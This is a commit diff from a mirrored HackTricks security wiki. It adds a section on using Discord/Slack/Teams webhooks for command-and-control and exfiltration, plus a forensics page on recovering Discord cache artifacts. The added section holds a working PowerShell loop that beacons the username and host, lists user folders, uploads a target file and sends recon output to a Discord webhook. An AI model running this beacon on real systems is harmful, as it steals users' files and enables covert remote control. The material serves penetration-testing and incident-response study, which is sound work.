mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Merge pull request #1410 from HackTricks-wiki/update_Discord_as_a_C2_and_the_cached_evidence_left_behin_20250916_125230
Discord as a C2 and the cached evidence left behind
This commit is contained in:
commit
bacfd40952
@ -59,6 +59,7 @@
|
||||
- [Decompile compiled python binaries (exe, elf) - Retreive from .pyc](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md)
|
||||
- [Browser Artifacts](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md)
|
||||
- [Deofuscation vbs (cscript.exe)](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md)
|
||||
- [Discord Cache Forensics](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/discord-cache-forensics.md)
|
||||
- [Local Cloud Storage](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md)
|
||||
- [Office file analysis](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md)
|
||||
- [PDF File analysis](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md)
|
||||
|
@ -112,6 +112,93 @@ if __name__ == "__main__":
|
||||
###
|
||||
```
|
||||
|
||||
## Webhooks (Discord/Slack/Teams) for C2 & Data Exfiltration
|
||||
|
||||
Webhooks are write-only HTTPS endpoints that accept JSON and optional file parts. They’re commonly allowed to trusted SaaS domains and require no OAuth/API keys, making them useful for low-friction beaconing and exfiltration.
|
||||
|
||||
Key ideas:
|
||||
- Endpoint: Discord uses https://discord.com/api/webhooks/<id>/<token>
|
||||
- POST multipart/form-data with a part named payload_json containing {"content":"..."} and optional file part(s) named file.
|
||||
- Operator loop pattern: periodic beacon -> directory recon -> targeted file exfil -> recon dump -> sleep. HTTP 204 NoContent/200 OK confirm delivery.
|
||||
|
||||
PowerShell PoC (Discord):
|
||||
|
||||
```powershell
|
||||
# 1) Configure webhook and optional target file
|
||||
$webhook = "https://discord.com/api/webhooks/YOUR_WEBHOOK_HERE"
|
||||
$target = Join-Path $env:USERPROFILE "Documents\SENSITIVE_FILE.bin"
|
||||
|
||||
# 2) Reuse a single HttpClient
|
||||
$client = [System.Net.Http.HttpClient]::new()
|
||||
|
||||
function Send-DiscordText {
|
||||
param([string]$Text)
|
||||
$payload = @{ content = $Text } | ConvertTo-Json -Compress
|
||||
$jsonContent = New-Object System.Net.Http.StringContent($payload, [System.Text.Encoding]::UTF8, "application/json")
|
||||
$mp = New-Object System.Net.Http.MultipartFormDataContent
|
||||
$mp.Add($jsonContent, "payload_json")
|
||||
$resp = $client.PostAsync($webhook, $mp).Result
|
||||
Write-Host "[Discord] text -> $($resp.StatusCode)"
|
||||
}
|
||||
|
||||
function Send-DiscordFile {
|
||||
param([string]$Path, [string]$Name)
|
||||
if (-not (Test-Path $Path)) { return }
|
||||
$bytes = [System.IO.File]::ReadAllBytes($Path)
|
||||
$fileContent = New-Object System.Net.Http.ByteArrayContent(,$bytes)
|
||||
$fileContent.Headers.ContentType = [System.Net.Http.Headers.MediaTypeHeaderValue]::Parse("application/octet-stream")
|
||||
$json = @{ content = ":package: file exfil: $Name" } | ConvertTo-Json -Compress
|
||||
$jsonContent = New-Object System.Net.Http.StringContent($json, [System.Text.Encoding]::UTF8, "application/json")
|
||||
$mp = New-Object System.Net.Http.MultipartFormDataContent
|
||||
$mp.Add($jsonContent, "payload_json")
|
||||
$mp.Add($fileContent, "file", $Name)
|
||||
$resp = $client.PostAsync($webhook, $mp).Result
|
||||
Write-Host "[Discord] file $Name -> $($resp.StatusCode)"
|
||||
}
|
||||
|
||||
# 3) Beacon/recon/exfil loop
|
||||
$ctr = 0
|
||||
while ($true) {
|
||||
$ctr++
|
||||
# Beacon
|
||||
$beacon = "━━━━━━━━━━━━━━━━━━`n:satellite: Beacon`n```User: $env:USERNAME`nHost: $env:COMPUTERNAME```"
|
||||
Send-DiscordText -Text $beacon
|
||||
|
||||
# Every 2nd: quick folder listing
|
||||
if ($ctr % 2 -eq 0) {
|
||||
$dirs = @("Documents","Desktop","Downloads","Pictures")
|
||||
$acc = foreach ($d in $dirs) {
|
||||
$p = Join-Path $env:USERPROFILE $d
|
||||
$items = Get-ChildItem -Path $p -ErrorAction SilentlyContinue | Select-Object -First 3 -ExpandProperty Name
|
||||
if ($items) { "`n$d:`n - " + ($items -join "`n - ") }
|
||||
}
|
||||
Send-DiscordText -Text (":file_folder: **User Dirs**`n━━━━━━━━━━━━━━━━━━`n```" + ($acc -join "") + "```")
|
||||
}
|
||||
|
||||
# Every 3rd: targeted exfil
|
||||
if ($ctr % 3 -eq 0) { Send-DiscordFile -Path $target -Name ([IO.Path]::GetFileName($target)) }
|
||||
|
||||
# Every 4th: basic recon
|
||||
if ($ctr % 4 -eq 0) {
|
||||
$who = whoami
|
||||
$ip = ipconfig | Out-String
|
||||
$tmp = Join-Path $env:TEMP "recon.txt"
|
||||
"whoami:: $who`r`nIPConfig::`r`n$ip" | Out-File -FilePath $tmp -Encoding utf8
|
||||
Send-DiscordFile -Path $tmp -Name "recon.txt"
|
||||
}
|
||||
|
||||
Start-Sleep -Seconds 20
|
||||
}
|
||||
```
|
||||
|
||||
Notes:
|
||||
- Similar patterns apply to other collaboration platforms (Slack/Teams) using their incoming webhooks; adjust URL and JSON schema accordingly.
|
||||
- For DFIR of Discord Desktop cache artifacts and webhook/API recovery, see:
|
||||
|
||||
{{#ref}}
|
||||
../generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/discord-cache-forensics.md
|
||||
{{#endref}}
|
||||
|
||||
## FTP
|
||||
|
||||
### FTP server (python)
|
||||
@ -364,7 +451,10 @@ Then copy-paste the text into the windows-shell and a file called nc.exe will be
|
||||
|
||||
- [https://github.com/Stratiz/DNS-Exfil](https://github.com/Stratiz/DNS-Exfil)
|
||||
|
||||
{{#include ../banners/hacktricks-training.md}}
|
||||
|
||||
## References
|
||||
|
||||
- [Discord as a C2 and the cached evidence left behind](https://www.pentestpartners.com/security-blog/discord-as-a-c2-and-the-cached-evidence-left-behind/)
|
||||
- [Discord Webhooks – Execute Webhook](https://discord.com/developers/docs/resources/webhook#execute-webhook)
|
||||
- [Discord Forensic Suite (cache parser)](https://github.com/jwdfir/discord_cache_parser)
|
||||
|
||||
{{#include ../banners/hacktricks-training.md}}
|
@ -80,6 +80,12 @@ Within these directories, most user data can be found in the **Default/** or **C
|
||||
- **History**: Contains URLs, downloads, and search keywords. On Windows, [ChromeHistoryView](https://www.nirsoft.net/utils/chrome_history_view.html) can be used to read the history. The "Transition Type" column has various meanings, including user clicks on links, typed URLs, form submissions, and page reloads.
|
||||
- **Cookies**: Stores cookies. For inspection, [ChromeCookiesView](https://www.nirsoft.net/utils/chrome_cookies_view.html) is available.
|
||||
- **Cache**: Holds cached data. To inspect, Windows users can utilize [ChromeCacheView](https://www.nirsoft.net/utils/chrome_cache_view.html).
|
||||
|
||||
Electron-based desktop apps (e.g., Discord) also use Chromium Simple Cache and leave rich on-disk artifacts. See:
|
||||
|
||||
{{#ref}}
|
||||
discord-cache-forensics.md
|
||||
{{#endref}}
|
||||
- **Bookmarks**: User bookmarks.
|
||||
- **Web Data**: Contains form history.
|
||||
- **Favicons**: Stores website favicons.
|
||||
|
@ -0,0 +1,91 @@
|
||||
# Discord Cache Forensics (Chromium Simple Cache)
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
This page summarizes how to triage Discord Desktop cache artifacts to recover exfiltrated files, webhook endpoints, and activity timelines. Discord Desktop is an Electron/Chromium app and uses Chromium Simple Cache on disk.
|
||||
|
||||
## Where to look (Windows/macOS/Linux)
|
||||
|
||||
- Windows: %AppData%\discord\Cache\Cache_Data
|
||||
- macOS: ~/Library/Application Support/discord/Cache/Cache_Data
|
||||
- Linux: ~/.config/discord/Cache/Cache_Data
|
||||
|
||||
Key on‑disk structures inside Cache_Data:
|
||||
- index: Simple Cache index database
|
||||
- data_#: Binary cache block files that can contain multiple cached objects
|
||||
- f_######: Individual cached entries stored as standalone files (often larger bodies)
|
||||
|
||||
Note: Deleting messages/channels/servers in Discord does not purge this local cache. Cached items often remain and their file timestamps align with user activity, enabling timeline reconstruction.
|
||||
|
||||
## What can be recovered
|
||||
|
||||
- Exfiltrated attachments and thumbnails fetched via cdn.discordapp.com/media.discordapp.net
|
||||
- Images, GIFs, videos (e.g., .jpg, .png, .gif, .webp, .mp4, .webm)
|
||||
- Webhook URLs (https://discord.com/api/webhooks/…)
|
||||
- Discord API calls (https://discord.com/api/vX/…)
|
||||
- Helpful for correlating beaconing/exfil activity and hashing media for intel matching
|
||||
|
||||
## Quick triage (manual)
|
||||
|
||||
- Grep cache for high-signal artifacts:
|
||||
- Webhook endpoints:
|
||||
- Windows: findstr /S /I /C:"https://discord.com/api/webhooks/" "%AppData%\discord\Cache\Cache_Data\*"
|
||||
- Linux/macOS: strings -a Cache_Data/* | grep -i "https://discord.com/api/webhooks/"
|
||||
- Attachment/CDN URLs:
|
||||
- strings -a Cache_Data/* | grep -Ei "https://(cdn|media)\.discord(app)?\.com/attachments/"
|
||||
- Discord API calls:
|
||||
- strings -a Cache_Data/* | grep -Ei "https://discord(app)?\.com/api/v[0-9]+/"
|
||||
- Sort cached entries by modified time to build a quick timeline (mtime reflects when the object hit cache):
|
||||
- Windows PowerShell: Get-ChildItem "$env:AppData\discord\Cache\Cache_Data" -File -Recurse | Sort-Object LastWriteTime | Select-Object LastWriteTime, FullName
|
||||
|
||||
## Parsing f_* entries (HTTP body + headers)
|
||||
|
||||
Files starting with f_ contain HTTP response headers followed by the body. The header block typically ends with \r\n\r\n. Useful response headers include:
|
||||
- Content-Type: To infer media type
|
||||
- Content-Location or X-Original-URL: Original remote URL for preview/correlation
|
||||
- Content-Encoding: May be gzip/deflate/br (Brotli)
|
||||
|
||||
Media can be extracted by splitting headers from body and optionally decompressing based on Content-Encoding. Magic-byte sniffing is useful when Content-Type is absent.
|
||||
|
||||
## Automated DFIR: Discord Forensic Suite (CLI/GUI)
|
||||
|
||||
- Repo: https://github.com/jwdfir/discord_cache_parser
|
||||
- Function: Recursively scans Discord’s cache folder, finds webhook/API/attachment URLs, parses f_* bodies, optionally carves media, and outputs HTML + CSV timeline reports with SHA‑256 hashes.
|
||||
|
||||
Example CLI usage:
|
||||
|
||||
```bash
|
||||
# Acquire cache (copy directory for offline parsing), then run:
|
||||
python3 discord_forensic_suite_cli \
|
||||
--cache "%AppData%\discord\Cache\Cache_Data" \
|
||||
--outdir C:\IR\discord-cache \
|
||||
--output discord_cache_report \
|
||||
--format both \
|
||||
--timeline \
|
||||
--extra \
|
||||
--carve \
|
||||
--verbose
|
||||
```
|
||||
|
||||
Key options:
|
||||
- --cache: Path to Cache_Data
|
||||
- --format html|csv|both
|
||||
- --timeline: Emit ordered CSV timeline (by modified time)
|
||||
- --extra: Also scan sibling Code Cache and GPUCache
|
||||
- --carve: Carve media from raw bytes near regex hits (images/video)
|
||||
- Output: HTML report, CSV report, CSV timeline, and a media folder with carved/extracted files
|
||||
|
||||
## Analyst tips
|
||||
|
||||
- Correlate the modified time (mtime) of f_* and data_* files with user/attacker activity windows to reconstruct a timeline.
|
||||
- Hash recovered media (SHA-256) and compare against known-bad or exfil datasets.
|
||||
- Extracted webhook URLs can be tested for liveness or rotated; consider adding them to blocklists and retro-hunting proxies.
|
||||
- Cache persists after “wiping” on the server side. If acquisition is possible, collect the entire Cache directory and related sibling caches (Code Cache, GPUCache).
|
||||
|
||||
## References
|
||||
|
||||
- [Discord as a C2 and the cached evidence left behind](https://www.pentestpartners.com/security-blog/discord-as-a-c2-and-the-cached-evidence-left-behind/)
|
||||
- [Discord Forensic Suite (CLI/GUI)](https://github.com/jwdfir/discord_cache_parser)
|
||||
- [Discord Webhooks – Execute Webhook](https://discord.com/developers/docs/resources/webhook#execute-webhook)
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
Loading…
x
Reference in New Issue
Block a user